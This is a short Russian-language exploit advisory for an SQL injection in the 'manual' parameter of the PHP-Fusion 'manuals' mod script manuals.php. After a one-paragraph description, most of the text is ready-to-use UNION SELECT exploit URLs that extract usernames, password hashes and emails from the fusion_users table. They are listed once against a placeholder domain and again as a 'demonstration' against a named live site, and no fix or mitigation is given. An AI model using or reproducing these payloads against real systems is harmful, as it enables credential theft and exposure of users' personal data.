Программа: PHP-Fusion Mod manuals
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «manual» сценарием manuals.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
username:
http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+
union+all+select+user_name,2+from+fusion_users--&page=1
password:
http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+
union+all+select+user_password,2+from+fusion_users--&page=1
email:
http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+
union+all+select+user_email,2+from+fusion_users--&page=1
Демонстрация:
http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_name,2+from+fusion_users--&page=1
http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_password,2+from+fusion_users--&page=1
http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_email,2+from+fusion_users--&page=1